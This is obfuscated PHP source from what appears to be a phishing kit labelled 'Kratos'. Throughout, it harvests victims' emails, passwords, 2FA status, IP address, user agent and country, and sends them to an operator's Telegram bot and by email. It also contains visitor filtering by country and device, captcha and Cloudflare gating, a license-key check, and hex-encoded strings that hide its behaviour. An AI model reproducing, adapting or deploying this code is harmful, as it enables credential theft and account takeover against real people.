readJsonFile($bbcd6) { goto C028a; edd8b: return is_array($F9771) ? $F9771 : []; goto D3c71; fb45f: F7234: goto C2170; E0c8f: file_put_contents($bbcd6, json_encode([])); goto f3de2; Daf1e: $F9771 = json_decode($Ab5fa, true); goto edd8b; C028a: if (file_exists($bbcd6)) { goto F7234; } goto E0c8f; f3de2: return []; goto fb45f; C2170: $Ab5fa = file_get_contents($bbcd6); goto Daf1e; D3c71: } public function writeJsonFile($bbcd6, $F9771) { $Ab5fa = json_encode($F9771, JSON_PRETTY_PRINT); file_put_contents($bbcd6, $Ab5fa); } public function getFirstDataByIp($F9771, $A6d4e) { goto d7bef; Dbc6f: return null; goto F2f3f; d7bef: foreach ($F9771 as $Dd0d3) { goto E2eaa; F9e54: b1160: goto A27e5; E2eaa: if (!(isset($Dd0d3["ip"]) && $Dd0d3["ip"] === $A6d4e)) { goto b1160; } goto D903a; D903a: return $Dd0d3; goto F9e54; A27e5: e3b34: goto F34af; F34af: } goto Bd0bb; Bd0bb: B6176: goto Dbc6f; F2f3f: } public function generatePrimaryId($F9771) { goto C36f8; F8cb9: foreach ($F9771 as $Dd0d3) { goto eeac8; e296f: b3159: goto D22e4; D22e4: C9d40: goto A9886; eeac8: if (!(isset($Dd0d3["id"]) && $Dd0d3["id"] > $dd717)) { goto b3159; } goto A2401; A2401: $dd717 = $Dd0d3["id"]; goto e296f; A9886: } goto f94a1; A8ea0: return $dd717 + 1; goto f8eb4; f94a1: Bf830: goto A8ea0; C36f8: $dd717 = 0; goto F8cb9; f8eb4: } public function isDataExist($F9771, $A6d4e) { goto Ec11b; b6303: b0ee3: goto ca904; ca904: return false; goto E7dba; Ec11b: foreach ($F9771 as $Dd0d3) { goto D0a99; a1c24: f7751: goto cae09; F46a9: return true; goto d7447; d7447: b28a1: goto a1c24; D0a99: if (!(isset($Dd0d3["ip"]) && $Dd0d3["ip"] === $A6d4e)) { goto b28a1; } goto F46a9; cae09: } goto b6303; E7dba: } public function onlyOneTimeUse() { goto E897e; B3ca4: $F4bfb = false; goto ed261; b23b0: $A6d4e = ""; goto B91db; D00ed: foreach ($F9771 as $F1d02) { goto Ad518; f24df: c4fac: goto A634e; ee05c: $F4bfb = true; goto c00fd; D0835: if ($F1d02["details"]["twofactor"]) { goto E8268; } goto C4c77; E3c1a: c3dce: goto ee05c; a1173: Bbc46: goto f24df; f6876: if ($F1d02["details"]["twofactor"] && $F1d02["details"]["twofactor_status"] == "Complete") { goto c3dce; } goto D0835; Ad518: if (!($F1d02["ip"] == $A6d4e)) { goto Bbc46; } goto f6876; C4c77: $F4bfb = true; goto C9935; a8153: goto b2a00; goto E3c1a; c00fd: b2a00: goto a1173; C9935: E8268: goto a8153; A634e: } goto C3754; B6a59: $F9771 = $this->readJsonFile($bbcd6); goto B3ca4; c4415: if (!($A6d4e == "::1")) { goto c2139; } goto b23b0; E897e: $d8f16 = dirname(__FILE__); goto efa13; efa13: $bbcd6 = $d8f16 . "/../" . $this->A59a0["files"]["valid"]; goto B6a59; a5959: return $F4bfb; goto d9147; ed261: $A6d4e = $this->getClientIp(); goto c4415; C3754: a9af6: goto a5959; B91db: c2139: goto D00ed; d9147: } public function editData($E939e, $Fd2bb) { goto ef136; Ab5b1: $this->writeJsonFile($bbcd6, $F9771); goto dd7af; ef136: $d8f16 = dirname(__FILE__); goto ea70a; ea70a: $bbcd6 = $d8f16 . "/../" . $this->A59a0["files"]["valid"]; goto c9d99; b9c5d: F6e4b: goto fc2a4; c9d99: $F9771 = $this->readJsonFile($bbcd6); goto D7c91; D7c91: $af549 = 0; goto fa9f3; fa9f3: foreach ($F9771 as $F1d02) { goto Fe5e2; ab9e9: $af549++; goto d265f; Fe5e2: if (!($F1d02["details"]["email"] == $E939e)) { goto e182e; } goto ffa64; ffa64: $e7c18 = $af549; goto Cc943; Cc943: e182e: goto ab9e9; d265f: de15d: goto dddec; dddec: } goto b9c5d; fc2a4: $F9771[$e7c18]["details"]["twofactor_status"] = $Fd2bb; goto Ab5b1; dd7af: } public function insertAdditional($A528b, $E939e, $aad56, $Fa64a = true) { goto Bb6f4; B9e9a: $B8967["details"]["password"] = $aad56; goto C6fd2; C9f4f: goto A5334; goto e575a; e5a59: e7f1f: goto Fe653; A7bd4: if ($B8967["details"]["twofactor"]) { goto e0aa5; } goto e355d; dad72: $this->writeJsonFile($bbcd6, $F9771); goto db407; F698d: $F9771[] = $B8967; goto dad72; D8952: Fd2b1: goto cef48; e575a: e0aa5: goto Ef428; D6c49: A5334: goto e5a59; e26b4: $bbcd6 = $d8f16 . "/../" . $this->A59a0["files"]["valid"]; goto D8952; bfd4b: $bbcd6 = $d8f16 . "/../" . $this->A59a0["files"]["invalid"]; goto fba48; E6595: $B8967["details"]["twofactor"] = $A528b["twofactor"]; goto F2c5c; e355d: $B8967["details"]["twofactor_status"] = "No"; goto C9f4f; Dc2a1: $B8967["details"]["edu"] = $A528b["edu"]; goto B818d; F59f7: $B8967 = $_SESSION["user_data"]; goto B625f; a74a2: e54f2: goto e26b4; Ef428: $B8967["details"]["twofactor_status"] = "Waiting"; goto D6c49; B818d: $B8967["details"]["type"] = $A528b["type"]; goto A7bd4; F2c5c: $B8967["details"]["role"] = $A528b["role"]; goto Dc2a1; fba48: goto Fd2b1; goto a74a2; bd033: if ($Fa64a) { goto e54f2; } goto bfd4b; Fe653: $B8967["id"] = $this->generatePrimaryId($F9771); goto F698d; Bb6f4: $d8f16 = dirname(__FILE__); goto bd033; db407: $_SESSION["user_data"] = $B8967; goto B0f05; ae739: $B8967["details"]["email"] = $E939e; goto B9e9a; B625f: $B8967["details"]["status"] = $A528b["live"]; goto ae739; C6fd2: if (!$A528b["live"]) { goto e7f1f; } goto E6595; cef48: $F9771 = $this->readJsonFile($bbcd6); goto F59f7; B0f05: } public function insertDataVisitor($a998d = true) { goto F99d0; Aa442: $this->checkUserSecurity($B8967); goto f0b88; ba727: $A6d4e = $this->getClientIp(); goto De65c; D4614: b5c64: goto bb60f; c9812: Fe08b: goto D685b; Dcbab: $F9771[] = $B8967; goto A3eb5; Fae30: $_SESSION["user_data"] = $B8967; goto Aa442; D4fc6: A1523: goto ec6c3; Aac3d: $A6d4e = ""; goto D4fc6; bb60f: $B8967["id"] = $this->generatePrimaryId($F9771); goto Dcbab; Fc97a: $F9771 = $this->getFirstDataByIp($F9771, $A6d4e); goto Eab5f; db2c8: $F9771 = $this->readJsonFile($bbcd6); goto ba727; A3eb5: $this->writeJsonFile($bbcd6, $F9771); goto Fae30; Eab5f: $_SESSION["user_data"] = $F9771; goto A1981; e62f0: return 1; goto c9812; ec6c3: if (!$this->isDataExist($F9771, $A6d4e)) { goto Fe08b; } goto Fc97a; A1981: $this->checkUserSecurity($F9771); goto e62f0; D685b: if ($a998d) { goto A4db4; } goto e46e8; De65c: if (!($A6d4e == "::1")) { goto A1523; } goto Aac3d; e46e8: $B8967 = $this->insertUserInformation($A6d4e, false); goto ca2ae; ca2ae: goto b5c64; goto e3ed3; fbcfa: $bbcd6 = $d8f16 . "/../" . $this->A59a0["files"]["visit"]; goto db2c8; e3ed3: A4db4: goto Ed218; Ed218: $B8967 = $this->insertUserInformation($A6d4e); goto D4614; F99d0: $d8f16 = dirname(__FILE__); goto fbcfa; f0b88: } private function SendMessageTelegram($B0eec, $Eb0ea, $f040c) { goto cf0aa; D13fb: curl_close($Be897); goto bff90; a2edb: $Be897 = curl_init($a70df); goto A209d; bff90: return json_decode($D9bce, true); goto A7054; A209d: curl_setopt($Be897, CURLOPT_RETURNTRANSFER, true); goto C1f60; C1f60: curl_setopt($Be897, CURLOPT_POST, true); goto D48ab; cfd42: $F9771 = ["chat_id" => $Eb0ea, "text" => $f040c, "parse_mode" => "HTML"]; goto a2edb; F2a24: if (!curl_errno($Be897)) { goto abc87; } goto c738c; D0c1f: abc87: goto D13fb; c738c: echo "Error:" . curl_error($Be897); goto D0c1f; D48ab: curl_setopt($Be897, CURLOPT_POSTFIELDS, http_build_query($F9771)); goto B9349; B9349: curl_setopt($Be897, CURLOPT_HTTPHEADER, ["Content-type: application/x-www-form-urlencoded"]); goto Dd205; Dd205: $D9bce = curl_exec($Be897); goto F2a24; cf0aa: $a70df = "{$B0eec}/sendMessage"; goto cfd42; A7054: } private function SendFileTelegram($B0eec, $Eb0ea, $b51c0) { goto cce3c; d0f2b: curl_setopt($Be897, CURLOPT_HTTPHEADER, ["Content-Type:multipart/form-data"]); goto Bf562; e70e6: return $D9bce; goto A0d67; Eae8f: curl_setopt($Be897, CURLOPT_POSTFIELDS, $Df95c); goto Fb65f; cce3c: $a70df = "{$B0eec}/sendDocument"; goto a5894; fc85b: $Be897 = curl_init(); goto d0f2b; Fb65f: $D9bce = curl_exec($Be897); goto b85cb; bb868: curl_setopt($Be897, CURLOPT_RETURNTRANSFER, 1); goto Eae8f; a5894: $Df95c = ["chat_id" => $Eb0ea, "document" => new CURLFile(realpath($b51c0))]; goto fc85b; Bf562: curl_setopt($Be897, CURLOPT_URL, $a70df); goto bb868; b85cb: curl_close($Be897); goto e70e6; A0d67: } public function SendInfoTelegram($A528b, $E939e, $aad56) { goto a2ab5; Ad0b2: E6689: goto E8972; c6d24: D5ca5: goto b2ea8; A483a: $b1835 = $A528b["edu"] == true ? "Yes" : "No"; goto E47a2; bbde0: $ec8e9 = $A528b["role"] == true ? "Yes" : "No"; goto C3963; b98e5: $B17d9 .= "Return-Path: {$A5d79}" . "
"; goto d564c; Bb309: if (!$this->A59a0["telegram"]["active"]) { goto A00da; } goto Ddd46; D494c: $ddf49 = $A528b["twofactor"] == true ? "Yes" : "No"; goto e4bf2; Ffa3b: $b1835 = $A528b["edu"] == true ? "Yes" : "No"; goto bbde0; E3709: A00da: goto d141d; d3e74: if (@mail($b77a3, $ba22b, $f0a7a, $B17d9)) { goto D5ca5; } goto B7003; b36c6: Eab71: goto Ca301; da9a3: if (!file_exists($b51c0)) { goto b780b; } goto C1164; C1164: $this->SendFileTelegram($B0eec, $Eb0ea, $b51c0); goto F16c1; E47a2: $ec8e9 = $A528b["role"] == true ? "Yes" : "No"; goto D494c; Ff827: if ($A528b["live"]) { goto Ee748; } goto c7263; a0b5c: $B17d9 = "MIME-Version: 1.0" . "
\xa"; goto d9f00; E0814: $B17d9 .= "Reply-To: {$A5d79}" . "\xd\xa"; goto b98e5; e7b13: F3298: goto ef810; F3180: $A6d4e = $_SESSION["user_data"]["ip"]; goto D6c84; e02fb: $f0a7a = "<b>Kratos</b> Valid Result<br><br>\xd
Email : {$E939e}<br>\xd\xa Password : {$aad56}<br>
\xa IP: {$A6d4e}<br>\xd\xa User Agent: {$fb016}<br>\xd\xa Country: {$fe21d}<br>
2FA: {$ddf49}<br>\xd\xa Role: {$ec8e9}<br>\xd
Edu: {$b1835}"; goto d3e74; c7263: if (!(!$A528b["live"] && $this->A59a0["sendtype"] == 1)) { goto B127c; } goto ce7ab; D6c84: $fb016 = $_SESSION["user_data"]["ua"]; goto A483a; F2a94: $f040c = "<b>Kratos</b> Valid Result
\xaEmail : <code>{$E939e}</code>\xaPassword : <code>{$aad56}</code>\xaIP: {$A6d4e}
User Agent: <code>{$fb016}</code>
Country: {$fe21d}
2FA: {$ddf49}
Role: {$ec8e9}
Edu: {$b1835}"; goto f2c65; dbb3a: $fe21d = $_SESSION["user_data"]["info"]["country"]; goto dae9f; eb7f1: $Eb0ea = $this->A59a0["telegram"]["chat_id"]; goto e5caf; bd338: goto E6689; goto B3106; dae9f: $A6d4e = $_SESSION["user_data"]["ip"]; goto A8757; Fc377: $fe21d = $_SESSION["user_data"]["info"]["country"]; goto F2800; a2ab5: $d8f16 = dirname(__FILE__); goto e1d72; c0945: $A5d79 = "noreply@" . $Eaf42; goto a879a; d141d: if (!$this->A59a0["email"]["active"]) { goto A38ca; } goto Fdde2; be154: if (@mail($b77a3, $ba22b, $f0a7a, $B17d9)) { goto Eab71; } goto a79f8; a3ebc: goto e895b; goto Ebe0d; B2c30: $f0a7a = "<b>Kratos</b> <s>Invalid</s> Result<br><br>\xd
Email : {$E939e}<br>
Password : {$aad56}<br>\xd\xa IP: {$A6d4e}<br>
User Agent: <code>{$fb016}<br>\xd
Country: {$fe21d}"; goto be154; d05d5: if (!(!$A528b["live"] && $this->A59a0["sendtype"] == 1)) { goto Eb759; } goto Fc377; e4bf2: $ba22b = "Student Detains [Valid]"; goto e02fb; Ddd46: $B0eec = $this->A59a0["telegram"]["bot_token"]; goto eb7f1; C33c5: $fb016 = $_SESSION["user_data"]["ua"]; goto C751a; Ebe0d: a458f: goto dbb3a; C3963: $ddf49 = $A528b["twofactor"] == true ? "Yes" : "No"; goto F2a94; B3106: Ee748: goto e0e3b; a79f8: return 0; goto Eb1e6; e0e3b: $fe21d = $_SESSION["user_data"]["info"]["country"]; goto F3180; Fdde2: $Eaf42 = $_SERVER["SERVER_NAME"]; goto Be13a; c7ffa: $B17d9 .= "From: {$D6f8f} <{$A5d79}>" . "\xd
"; goto E0814; f2c65: $this->SendMessageTelegram($B0eec, $Eb0ea, $f040c); goto da9a3; b2ea8: return 1; goto B7490; d564c: $B17d9 .= "X-Mailer: PHP/" . phpversion() . "
"; goto Ff827; F16c1: b780b: goto ebea0; Eb1e6: goto F3298; goto b36c6; C751a: $ba22b = "Student Detains [Invalid]"; goto B2c30; e1d72: $b51c0 = $d8f16 . "/../page/core/js_" . $E939e . ".txt"; goto Bb309; F384b: goto A984e; goto c6d24; B7003: return 0; goto F384b; A8757: $fb016 = $_SESSION["user_data"]["ua"]; goto Ffa3b; ce7ab: $fe21d = $_SESSION["user_data"]["info"]["country"]; goto Dd02a; E8972: A38ca: goto ece0f; ef810: B127c: goto bd338; E1912: Eb759: goto a3ebc; Dbf77: $this->SendMessageTelegram($B0eec, $Eb0ea, $f040c); goto E1912; Ca301: return 1; goto e7b13; Dd02a: $A6d4e = $_SESSION["user_data"]["ip"]; goto C33c5; d49ce: $fb016 = $_SESSION["user_data"]["ua"]; goto B4d49; a879a: $D6f8f = "Student Detains"; goto a0b5c; B4d49: $f040c = "<b>Kratos</b> <s>Invalid</s> Result
Email : <code>{$E939e}</code>
Password : <code>{$aad56}</code>\xaIP: {$A6d4e}\xaUser Agent: <code>{$fb016}</code>\xaCountry: {$fe21d}"; goto Dbf77; B7490: A984e: goto Ad0b2; F2800: $A6d4e = $_SESSION["user_data"]["ip"]; goto d49ce; d9f00: $B17d9 .= "Content-type:text/html;charset=UTF-8" . "
\xa"; goto c7ffa; ebea0: e895b: goto E3709; e5caf: if ($A528b["live"]) { goto a458f; } goto d05d5; Be13a: $b77a3 = $this->A59a0["email"]["email"]; goto c0945; ece0f: } public function SendFileOnlyTelegram($A528b, $E939e, $a3e00) { goto ea0a6; Ec766: $this->SendMessageTelegram($B0eec, $Eb0ea, $f040c); goto B2315; ea0a6: $d8f16 = dirname(__FILE__); goto e6edd; Ad33c: $f040c = "<b>Kratos</b> 2FA is Failed
\xaEmail : <code>{$E939e}</code>
Method : <code>{$a3e00}</code>
Status : <code>Invalid</code>\xaReason : <code>{$A9d3c}</code>"; goto Ec766; e508d: $A9d3c = $A528b["reason"]; goto Ad33c; b5b78: $f040c = "<b>Kratos</b> 2FA is Completed\xa\xaEmail : <code>{$E939e}</code>\xaMethod : <code>{$a3e00}</code>\xaStatus : <code>Valid</code>"; goto Ef176; Ef176: $this->SendMessageTelegram($B0eec, $Eb0ea, $f040c); goto E7c25; Eea77: $B0eec = $this->A59a0["telegram"]["bot_token"]; goto fd514; e4262: if (!(!$A528b["live"] && $this->A59a0["sendtype"] == 1)) { goto Fcc6b; } goto e508d; fd514: $Eb0ea = $this->A59a0["telegram"]["chat_id"]; goto c757b; E7c25: if (!file_exists($b51c0)) { goto d11a1; } goto d1942; D8602: Affc2: goto Ec0aa; C0890: d11a1: goto D8602; c757b: if ($A528b["live"]) { goto d647c; } goto e4262; C39be: if (!$this->A59a0["telegram"]["active"]) { goto c3969; } goto Eea77; B2315: Fcc6b: goto E2539; e6edd: $b51c0 = $d8f16 . "/../page/core/js_" . $E939e . ".txt"; goto C39be; d1942: $this->SendFileTelegram($B0eec, $Eb0ea, $b51c0); goto C0890; Ec0aa: c3969: goto fb7c2; b4587: d647c: goto b5b78; E2539: goto Affc2; goto b4587; fb7c2: } public function checkCountryCode() { goto Adc10; e9e7b: if (!in_array($_SESSION["user_data"]["info"]["country_code"], $this->A59a0["unchecked_countries"])) { goto c2fc2; } goto D0bab; D0bab: $this->redirect("Country"); goto f0ffa; Adc10: if (isset($_SESSION["user_data"]["info"]["country_code"])) { goto Ad5ce; } goto e3bdc; a4be2: Ad5ce: goto e9e7b; f0ffa: c2fc2: goto d605b; e3bdc: return; goto a4be2; d605b: } public function checkDevice() { goto F2f8f; eea9c: $this->redirect("Device"); goto bd6c4; F2f8f: $B284f = $this->getDeviceType($this->getUserAgent()); goto bf141; bf141: if (!in_array($B284f, $this->A59a0["unchecked_devices"])) { goto E2621; } goto eea9c; bd6c4: E2621: goto B97e4; B97e4: } function getDeviceType($E2c97) { goto E7f63; d1996: return "tablet"; goto Ee5e2; Ee5e2: b84e6: goto dfe29; e4e06: return "mobile"; goto B8e0d; E7f63: if (!preg_match("/ipad|tablet|kindle|nook|android(?!.*mobile)/", $E2c97)) { goto b84e6; } goto d1996; E46db: return "desktop"; goto abb64; B8e0d: ddd28: goto E46db; dfe29: if (!preg_match("/mobile|android|iphone|ipod|blackberry|iemobile|opera mini|windows phone/", $E2c97)) { goto ddd28; } goto e4e06; abb64: } public function checkLockEmail($E939e) { goto F9185; be46a: $E8101 = "text to search"; goto Fd584; Fd584: if (file_exists($b51c0)) { goto Eb24e; } goto a44a5; f1b23: if (strpos($C8f62, $E939e) !== false) { goto A332f; } goto a0c83; A79b0: goto F5099; goto fc94a; ed572: goto Ebc69; goto dcf48; dcf48: Eb24e: goto cb8ee; cb8ee: $C8f62 = file_get_contents($b51c0); goto f1b23; a0c83: return false; goto A79b0; F9185: $b51c0 = "../" . $this->A59a0["lock_email"]["list"]; goto be46a; c25a9: return true; goto Cc105; ecfdd: Ebc69: goto c0c6f; fc94a: A332f: goto c25a9; a44a5: die("Email List Not found"); goto ed572; Cc105: F5099: goto ecfdd; c0c6f: } }
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/* Important Notice
Any unauthorized use of this content may lead to significant damage. This includes, but is not limited to, loss of revenue, reputational harm, and legal repercussions. By accessing this material, you agree to use it responsibly and understand that any misuse could result in consequences.
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goto e97da; e97da: error_reporting(0); goto D9900; Be38c: session_start(); goto E1406; D9900: ini_set("\x64\151\x73\x70\x6c\141\171\x5f\145\162\x72\157\162\163", 0); goto Eb649; Eb649: if (!(session_status() == PHP_SESSION_NONE)) { goto c7e8a; } goto Be38c; E1406: c7e8a: goto af058; af058: class Config { private $A59a0; public function __construct(array $config) { $this->A59a0 = $config; } public function check_captcha() { goto c6c6b; ec6c0: return true; goto E8343; Afbb9: Ac0d8: goto f8ee4; A4669: C98e0: goto e2c55; E8343: goto C98e0; goto Afbb9; c6c6b: if (!$this->A59a0["\143\x61\x70\x74\x63\150\x61"]["\141\143\164\x69\x76\x65"]) { goto Ac0d8; } goto ec6c0; f8ee4: return false; goto A4669; e2c55: } public function getMimeType($bbcd6) { goto D1895; c15a2: df311: goto d026c; C918e: if (function_exists("\x6d\151\x6d\145\x5f\x63\157\156\x74\x65\156\164\137\164\171\x70\x65")) { goto bf460; } goto A29ee; A0715: $B087f = mime_content_type($bbcd6); goto c15a2; A42a9: goto df311; goto Fa320; A29ee: $B087f = "\x61\x70\x70\x6c\151\x63\x61\164\x69\x6f\156\x2f\157\x63\x74\145\x74\55\163\x74\x72\145\x61\155"; goto A42a9; d026c: return $B087f; goto a9b45; D1895: if (function_exists("\x66\x69\x6e\x66\157\137\x66\151\154\x65")) { goto f113c; } goto C918e; fdc02: $fe408 = finfo_open(FILEINFO_MIME_TYPE); goto bd293; Fa320: f113c: goto fdc02; daee5: bf460: goto A0715; bd293: $B087f = finfo_file($fe408, $bbcd6); goto c75b1; B9fb4: goto df311; goto daee5; c75b1: finfo_close($fe408); goto B9fb4; a9b45: } public function check_cloudflare() { goto Efc93; C9531: return true; goto e9f24; B5cb8: Af200: goto C405e; A1778: return false; goto B5cb8; Efc93: if (!$this->A59a0["\143\154\x6f\x75\x64\146\154\141\162\x65"]["\141\143\164\151\x76\145"]) { goto a4b54; } goto C9531; e9f24: goto Af200; goto Ac08e; Ac08e: a4b54: goto A1778; C405e: } public function check_captcha_status() { goto d566d; B37d5: return true; goto A80a2; B91df: return false; goto e068b; e068b: goto Ed036; goto fa8f8; d566d: if ($this->check_captcha() && !isset($_SESSION["\x63\x61\x70\164\143\x68\141"])) { goto c6e13; } goto B91df; fa8f8: c6e13: goto B37d5; A80a2: Ed036: goto F5de1; F5de1: } public function check_cloudflare_status() { goto fdfbb; fca4e: return false; goto c91ef; bc6e7: return true; goto Acf5b; c91ef: goto da0f9; goto d8479; fdfbb: if ($this->check_cloudflare() && !isset($_SESSION["\143\x6c\x6f\x75\144\x66\x6c\141\162\145"])) { goto eabab; } goto fca4e; Acf5b: da0f9: goto de83f; d8479: eabab: goto bc6e7; de83f: } public function getRandomVoiceTitle() { goto D3e9c; D3e9c: $f8f15 = ["\46\x23\70\66\x3b\x26\43\61\61\x31\73\x26\x23\61\60\65\73\46\x23\71\x39\x3b\46\x23\61\x30\x31\x3b\46\x23\x33\62\x3b\46\x23\x37\x37\x3b\x26\43\x39\x37\73\x26\43\61\x30\x35\x3b\46\x23\61\60\x38\73\x26\43\x33\62\73\46\x23\67\x38\x3b\46\x23\61\x31\61\x3b\x26\x23\61\x31\x36\73\46\43\x31\60\x35\x3b\46\43\x31\60\62\x3b\x26\43\x31\x30\65\x3b\x26\x23\71\71\73\x26\43\x39\67\73\46\43\x31\61\x36\x3b\46\43\x31\x30\65\x3b\46\43\x31\x31\61\x3b\46\43\61\x31\x30\x3b", "\46\43\x38\66\73\46\43\x31\61\x31\73\x26\43\x31\x30\x35\73\46\43\x39\x39\x3b\46\x23\x31\60\x31\73\46\43\x33\62\x3b\x26\43\x37\x38\73\x26\x23\61\x31\61\x3b\46\43\61\x31\66\73\46\x23\x31\x30\61\x3b\x26\43\x33\x32\73\x26\43\67\x38\73\x26\43\61\61\61\73\x26\x23\x31\61\66\73\x26\x23\61\x30\65\x3b\x26\43\61\60\x32\73\46\43\61\x30\65\73\46\43\71\71\x3b\x26\x23\x39\x37\73\x26\43\x31\x31\66\x3b\x26\43\x31\60\65\73\x26\43\x31\x31\x31\73\x26\x23\61\x31\60\73", "\x26\43\x38\66\73\46\x23\61\x31\61\73\x26\43\61\x30\65\73\x26\x23\x39\x39\73\46\x23\61\60\61\73\x26\43\63\62\73\46\43\x37\x37\73\x26\43\x31\x30\x31\x3b\46\x23\61\x31\65\x3b\46\x23\x31\61\65\73\46\x23\71\x37\x3b\46\43\61\x30\63\73\x26\43\61\x30\61\73", "\x26\43\x37\x30\x3b\46\43\61\x30\x31\x3b\46\43\61\60\x31\73\x26\43\61\x30\x38\73\x26\43\63\62\73\46\43\70\x36\x3b\46\43\61\61\61\73\46\x23\x31\60\x35\x3b\x26\43\71\71\73\46\x23\x31\x30\61\x3b\46\43\x33\62\x3b\x26\43\x37\70\x3b\46\43\61\x31\x31\x3b\x26\43\61\61\x36\x3b\46\43\61\60\x31\73", "\x26\x23\70\66\73\46\x23\x31\61\x31\x3b\46\43\61\x30\x35\73\46\x23\x39\71\73\46\43\61\60\x31\x3b\x26\43\x33\62\73\x26\43\67\70\x3b\x26\43\61\x31\61\73\x26\43\x31\61\66\x3b\46\43\61\60\61\x3b\x26\43\63\x32\x3b\x26\43\x36\70\73\46\43\x31\x31\64\73\x26\x23\61\x31\x31\73\46\x23\61\61\x32\x3b\x26\43\63\x32\73\x26\43\x37\x30\x3b\46\x23\61\x30\x31\73\x26\43\x31\x30\x31\73\x26\43\61\x30\x38\73", "\46\43\x38\x36\x3b\x26\43\61\61\x31\73\x26\43\x31\x30\x35\x3b\x26\43\71\x39\73\46\43\x31\60\x31\x3b\46\x23\x33\62\x3b\x26\43\x37\x38\73\x26\43\61\61\x31\73\46\x23\x31\x31\66\73\x26\x23\61\x30\x31\73\46\43\63\x32\73\x26\43\70\63\x3b\46\43\x39\x37\x3b\x26\x23\61\61\x38\73\46\43\61\x30\61\73\x26\43\63\62\x3b\46\x23\70\63\x3b\46\x23\61\60\61\x3b\46\43\61\61\x36\73\x26\43\x33\x32\x3b\46\x23\67\x30\x3b\46\x23\61\x30\x31\73\x26\43\x31\x30\x31\x3b\x26\43\x31\x30\x38\x3b", "\46\x23\70\66\x3b\46\43\61\x31\61\73\46\x23\61\x30\65\73\x26\43\71\71\73\46\43\61\60\x31\x3b\x26\43\63\62\73\46\43\67\70\x3b\46\x23\61\x31\61\x3b\x26\43\61\x31\66\73\x26\x23\x31\x30\61\x3b\x26\x23\x33\62\73\46\43\x38\x34\73\x26\x23\61\61\64\73\x26\x23\x39\67\73\x26\x23\x31\61\60\x3b\x26\x23\x31\x31\x35\x3b\x26\43\61\x30\x39\x3b\x26\x23\61\x30\x35\73\x26\x23\x31\x31\66\x3b\x26\x23\x33\62\x3b\46\x23\67\60\73\x26\x23\61\60\x31\x3b\46\x23\61\x30\x31\x3b\46\43\x31\60\70\x3b", "\46\43\x37\60\73\46\x23\61\x31\61\x3b\x26\43\61\x31\x34\x3b\46\43\x33\x32\x3b\x26\x23\70\65\73\x26\x23\61\61\x30\73\x26\x23\61\x31\65\73\x26\x23\61\60\61\x3b\46\43\x33\x32\73\x26\x23\x38\66\73\x26\43\x31\x31\x31\x3b\46\x23\x31\x30\x35\x3b\46\43\x39\x39\73\46\x23\x31\60\x31\x3b\46\43\x33\x32\x3b\x26\x23\x37\x38\x3b\46\43\61\x31\x31\x3b\46\43\61\61\x36\x3b\46\x23\61\x30\61\73"]; goto dc405; F25f3: return $f8f15[$ca9ae]; goto C26cf; dc405: $ca9ae = rand(0, 7); goto F25f3; C26cf: } public function checkBothCaptcha($A528b = 0) { goto cc9c1; B55b0: f13e6: goto Ef9d2; Ef9d2: eec38: goto Ab04d; f4a04: if (!($this->check_cloudflare_status() || $this->check_captcha_status())) { goto c2b4f; } goto e32c2; e32c2: $this->redirect("\x46\141\151\x6c\x43\141\x70\164\x63\150\x61\x53\164\141\x74\x75\x73"); goto efded; c7d71: $this->redirect("\106\x61\x69\154\103\x61\x70\164\143\x68\141\x53\164\141\x74\165\x73"); goto B55b0; E4970: c8cbf: goto f4a04; A7db3: if ($A528b == 2) { goto b2e7e; } goto f0ff7; d6347: if (!$this->check_cloudflare_status()) { goto ccb13; } goto E463c; Ab2d1: e85ce: goto f925e; B29f0: b2e7e: goto d6347; cc9c1: if ($A528b == 0) { goto c8cbf; } goto A7db3; f925e: goto f730a; goto E4970; efded: c2b4f: goto A2f1c; D53be: if (!$this->check_captcha_status()) { goto f13e6; } goto c7d71; f0ff7: if (!($A528b == 1)) { goto eec38; } goto D53be; E463c: $this->redirect("\106\x61\151\154\103\141\160\164\x63\x68\141\123\x74\141\x74\165\163"); goto d1de7; d1de7: ccb13: goto Ab2d1; A2f1c: f730a: goto f20b0; Ab04d: goto e85ce; goto B29f0; f20b0: } public function redirect($B1942 = '') { header("\114\x6f\x63\141\x74\151\x6f\x6e\72\40" . $this->getRandomLink() . "\43" . $B1942); exit; } public function auth() { goto c2a30; c24c8: unset($_SESSION["\x73\x74\x61\x74\x75\x73"]); goto a47ae; d6327: if (isset($_SESSION["\141\x75\x74\x68"])) { goto aee3a; } goto e7f9a; eeb3e: A9d2d: goto da6e8; Dbbe3: $this->redirect("\111\156\x76\x61\x6c\x69\x64\x4b\145\x79"); goto cfa8e; Cbe1a: if (isset($_SESSION["\x61\165\164\x68"])) { goto e750a; } goto bb8b0; E194f: ea91d: goto D1271; d7e71: bfdf2: goto a3fea; A33bd: $d8f16 = dirname(__FILE__); goto C3cad; F5fbd: $this->redirect("\x4b\145\x79\105\170\160\151\162\145\144"); goto f19c4; a57c9: $a3e00 = 2; goto d7e71; A3b32: c6f29: goto C1e03; Efbbb: B75e5: goto a437e; fa307: ba98b: goto bc3b0; dbc34: curl_setopt($Be897, CURLOPT_RETURNTRANSFER, true); goto Be260; a47ae: A842b: goto Eada6; d2540: unset($_SESSION["\151\x6e\146\157\x5f\164\157\x6b\x65\x6e\x5f\62\x66\x61"]); goto Ac1b4; E59aa: curl_setopt($Be897, CURLOPT_POSTFIELDS, http_build_query($F9771)); goto D2866; D2866: $Fcdbd = curl_exec($Be897); goto C3f4f; B70ed: if (!isset($_SESSION["\x73\164\141\x74\x75\x73"])) { goto A842b; } goto c24c8; Bc4f4: aee3a: goto Acd0b; a843d: $F9771 = ["\x63\x6f\144\x65" => $this->A59a0["\153\145\171"]]; goto F3c5f; bc3b0: if (!isset($_SESSION["\x75\x73\x65\162\x5f\x64\141\164\141"])) { goto B75e5; } goto Dca9a; db30a: $_SESSION["\153\145\x79"] = true; goto E194f; ae3c8: curl_close($Be897); goto Cbe1a; C1e03: if (!isset($_SESSION["\143\x6c\x6f\165\144\146\x6c\141\x72\145"])) { goto f57a7; } goto Dac1b; Eada6: if (!isset($_SESSION["\151\x6e\146\157\137\164\157\153\145\156\x5f\143\162\145\x64\145\x6e\x74\151\141\x6c\163"])) { goto Db8be; } goto d46ca; c147f: unset($_SESSION["\x63\x61\x70\164\143\x68\x61"]); goto A3b32; D1271: goto ed96b; goto eeb3e; d46ca: unset($_SESSION["\x69\x6e\146\157\x5f\x74\x6f\153\145\156\137\143\162\145\x64\x65\156\164\x69\141\154\x73"]); goto Ec513; C3f4f: if (curl_errno($Be897)) { goto A9d2d; } goto df7cb; Be260: curl_setopt($Be897, CURLOPT_POST, true); goto E59aa; e7f9a: 